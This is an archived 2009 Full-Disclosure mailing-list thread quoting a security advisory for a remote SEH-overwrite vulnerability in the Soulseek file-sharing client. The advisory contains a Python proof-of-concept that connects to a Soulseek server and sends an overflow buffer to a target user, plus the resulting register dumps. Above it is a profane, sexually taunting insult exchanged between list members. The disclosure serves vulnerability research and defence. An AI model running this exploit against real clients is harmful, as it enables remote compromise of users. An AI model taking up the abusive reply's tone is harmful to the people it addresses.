OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: [Full-disclosure] Soulseek * P2P Remote Distributed Search Code Execution

From: laurent gaffie (laurent.gaffiegmail.com)
Date: Fri Jun 05 2009 - 01:15:52 CDT


It seem like you're an asshole, and also it seems you have some undisclosed
brain-prick activity, which mean that i should foward all the spams i get to
you , including "*Ritalin solution"*, get valium, and clearly: enlarge your
penis ( as your girlfriend asked me to do that call for you )

Now if you please, get the fuck out of this mailing list, and get a life
kid.

009/6/5 Pete Licoln <pete.licolngmail.com>

> Seems like you have a problem with responsible disclosure Kid ;
> Do you have any familly relationship with jeremy Brown ? ;P
>
>
> http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments
>
> 2009/5/25 Pete Licoln <pete.licolngmail.com>
>
> Oh so you have a blog ...
>> http://g-laurent.blogspot.com/
>>
>> 2009/5/25 laurent gaffie <laurent.gaffiegmail.com>
>>
>>> =============================================
>>> - Release date: May 24th, 2009
>>> - Discovered by: Laurent Gaffié
>>> - Severity: critical
>>> =============================================
>>>
>>> I. VULNERABILITY
>>> -------------------------
>>> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
>>>
>>> II. BACKGROUND
>>> -------------------------
>>> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
>>>
>>> sharing application.
>>> One of the things that makes Soulseek(tm) unique is our community and
>>> community-related features.
>>> Based on peer-to-peer technology, virtual rooms allow you to meet people
>>> with
>>> the same interests, share information, and chat freely using real-time
>>> messages
>>> in public or private.
>>> Soulseek(tm), with its built-in people matching system, is a great way to
>>> make
>>> new friends and expand your mind!"
>>>
>>> III. DESCRIPTION
>>> -------------------------
>>> Soulseek client allows distributed file search to one person, everyone,
>>> or in a
>>> specific Soulseek IRC channel, allowing a user to find the files he
>>> wants, in
>>> a dedicated channel, or with his contacts, or on the whole network.
>>> Unfortunatly this feature is vulnerable to a remote SEH overwrite to a
>>> specific
>>> user, or even to a whole Soulseek IRC channel.
>>>
>>> IV. PROOF OF CONCEPT
>>> -------------------------
>>> This proof of concept is made to prevent a S-K party, it is only build to
>>>
>>> target the user "testt4321".
>>>
>>> To try this proof of concept, you would have to open a soulseek client
>>> and use
>>> the username:
>>> "testt4321"
>>> with the password:
>>> "12345678"
>>> And launch this code.
>>> If you want to change the username or target a whole channel, you would
>>> have
>>> to reverse the binary protocol
>>>
>>>
>>>
>>> #!/usr/bin/python
>>> import struct
>>> import sys, socket
>>> from time import *
>>>
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch
>>>
>>> buffer =
>>> "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
>>> buffer+=
>>> "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
>>> buffer+=
>>> "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
>>> buffer+=
>>> "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
>>> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
>>>
>>> s.send(buffer)
>>> sleep(1)
>>>
>>> junk = "\x41" * 3084
>>> next_seh = struct.pack('<L', 0x42424242)
>>> seh = struct.pack('<L', 0x43434343)
>>> other_junk = "\x61" * 1423
>>>
>>> buffer2 =
>>> "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
>>> buffer2+=
>>> "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
>>> s.send(buffer2)
>>> sleep(1)
>>> s.recv(1024)
>>>
>>>
>>>
>>> After the query is send, the memory will look like this
>>> 0012FBE4 41414141
>>> 0012FBE8 42424242 Pointer to next SEH record
>>> 0012FBEC 43434343 SE handler
>>> 0012FBF0 61616161
>>>
>>> And the program will terminate with this structure:
>>> EAX 00000000
>>> ECX 43434343
>>> EDX 7C9132BC ntdll.7C9132BC
>>> EBX 00000000
>>> ESP 0012EA78
>>> EBP 0012EA98
>>> ESI 00000000
>>> EDI 00000000
>>> EIP 43434343
>>>
>>>
>>> V. BUSINESS IMPACT
>>> -------------------------
>>> An attacker could exploit this vulnerability to compromise any Soulseek
>>> client connected to
>>> the Soulseek network.
>>>
>>> VI. SYSTEMS AFFECTED
>>> -------------------------
>>> Windows all versions running Soulseek *
>>>
>>> VII. SOLUTION
>>> -------------------------
>>> A fast solution would be to use Nicotine-Plus (
>>> http://nicotine-plus.sourceforge.net/)
>>> a Python Soulseek client.
>>> Another quick workaround (at server level) would be to limit the search
>>> query lenght.
>>>
>>> VIII. REFERENCES
>>> -------------------------
>>> http://www.slsknet.org
>>>
>>> IX. CREDITS
>>> -------------------------
>>> This vulnerability has been discovered by Laurent Gaffié
>>> Laurent.gaffie{remove-this}(at)gmail.com
>>>
>>>
>>> X. REVISION HISTORY
>>> -------------------------
>>> May 24, 2009: Initial release
>>>
>>>
>>> XI. DISCLOSURE TIMELINE
>>> -------------------------
>>> july 29, 2008: Bug discovered
>>> September 03, 2008: Vendor contacted; no response.
>>> October 14, 2008: Vendor contacted; still no response.
>>> April 12, 2009: Idefense contacted.
>>> April 13, 2009: Idefense answered.
>>> April 23, 2009: Advisory send to idefense contributor program.
>>> May 13, 2009: Idefense contacted, bug rejected (no reason given)
>>> May 15, 2009: Idefense recontacted; no answer.
>>> May 16, 2009: Last try to contact Soulseek maintainers
>>> May 24, 2009: Advisory published.
>>>
>>> XII. LEGAL NOTICES
>>> -------------------------
>>> The information contained within this advisory is supplied "as-is"
>>> with no warranties or guarantees of fitness of use or otherwise.
>>> I accept no responsibility for any damage caused by the use or
>>> misuse of this information.
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/